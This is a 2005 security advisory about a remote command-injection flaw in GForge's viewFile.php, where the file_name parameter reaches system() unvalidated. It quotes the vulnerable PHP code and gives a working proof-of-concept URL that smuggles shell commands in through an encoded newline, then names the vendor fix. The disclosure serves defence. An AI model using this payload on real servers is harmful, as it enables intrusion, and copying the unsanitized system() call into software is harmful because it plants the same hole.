gforgeexec.txt

2005-08-14T00:00:00
ID PACKETSTORM:39304
Type packetstorm
Reporter Filippo Spike Morelli
Modified 2005-08-14T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------------  
Vendor : Gforge (http://gforge.org)  
Product : gforge  
Affected versions : < 4.0  
Bug fixed : >= 4.0 & Debian pkg 3.1-30  
Vulnerability : Input validation flaw  
Problem-Type : remote  
Severity : High, arbitrary command execution  
  
Author : Filippo Spike Morelli  
--------------------------------------------------------------------------  
  
  
--------------------------------------------------------------------------  
Background  
--------------------------------------------------------------------------  
  
GForge helps you manage the entire development life cycle  
  
GForge has tools to help your team collaborate, like message forums and  
mailing lists; tools to create and control access to Source Code Management  
repositories like CVS and Subversion. GForge automatically creates a  
repository and controls access to it depending on the role settings of the  
project.  
  
--------------------------------------------------------------------------  
Bug Description  
--------------------------------------------------------------------------  
The scm component shipped with gforge has a bug in the viewFile.php script.  
This script is supposed to serve a file info request, outputting its  
history, diffs, and all the other relevant info stored in the repository.  
There is a flaw in the file_name parameter validation, so a properly  
crafted url can lead to arbitrary command execution under the uid the  
webserver runs as.  
  
Files involved:  
$GFORGE/www/scm/viewFile.php  
$GFORGE/common/include/cvsweb/RCSHandler.class  
  
The problem is in "file_name" url field not properly validated.  
  
$GFORGE/www/scm/viewFile.php  
.....  
if($allow)  
{  
$DHD = new DirectoryHandler();  
$FHD = new FileHandler();  
$RCH = new RCSHandler();  
  
$CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;  
$DIRNAME = ($file_name != "")?"$file_name":"";  
$DIRNAME = $CVSROOT.$DIRNAME;  
....  
$RCSFile = $DIRNAME.",v";  
switch($view_action)  
{  
case "l":  
if(false === $RCH->getRCSLog($RCSFile))  
echo("Error: ".$RCH->getError());  
.....  
  
$GFORGE/common/include/cvsweb/RCSHandler.class  
RCSHandles class takes care of managing the RCS log and diffs for the  
requested  
file, and it is there that the malicious code is actually executed.  
......  
function getRCSLog($RCSFILE,$REV="all")  
{  
$rev = "";  
if($REV != "all")  
$rev = "-r$REV";  
  
$file = $this->generateTemp();  
$cmd = "rlog $rev $RCSFILE > $file";  
if(false === ($result = system($cmd)))  
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^  
{  
$this->setError("Could not execute '$cmd'");  
return false;  
}  
.....  
  
by system() the malicious code in $cmd is executed.  
  
  
--------------------------------------------------------------------------  
PoC  
--------------------------------------------------------------------------  
  
The analyzed command is "uname -a;id;w"  
  
gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx]  
"GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a  
HTTP/1.1" 200 2977  
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon;  
.NET CLR 1.1.4322)"  
  
----- "file_name=%0Auname%20-a;id;w%0a" -----  
%0a[A] = hexadecimal code for <return>.  
%20 = hexadecimal code for <space>  
---> "file_name=<return>uname -a;id;w<return>"  
  
looking at viewFile.php sourcecode:  
$DIRNAME = ($file_name != "")?"$file_name":"";  
so $DIRNAME = <return>uname -a;id;w<return>  
$RCSFile = $DIRNAME.",v";  
so $RCSFile = <return>uname -a;id;w<return>,v  
...  
$cmd = "rlog $rev $RCSFILE > $file";  
so $cmd = rlog all <return>uname -a;id;w<return>,v > $file  
  
if(false === ($result = system($cmd)))  
and then system executes:  
  
1. rlog all which gives back an error because of the non existing path  
2. <return>  
3. uname -a;id;w  
4. <return>  
5. and eventually the last part of the string, ",v", which gives back the  
error message "sh: ,v: command not found"  
  
--------------------------------------------------------------------------  
Solution  
--------------------------------------------------------------------------  
  
The vendor has been contacted and they promptly worked on a fix. At the time   
of writing the debian package available on Sid (gforge 3.1-30) has been   
fixed. As temporary fix it is possible to disable the scm component. Or just   
upgrade to latest version.  
  
  
regards,  
  
--   
Filippo Spike Morelli - Miu-ft System Administrator  
....................................  
.... follow the white rabbit ....  
... wait no, follow alice, she's so cute...  
`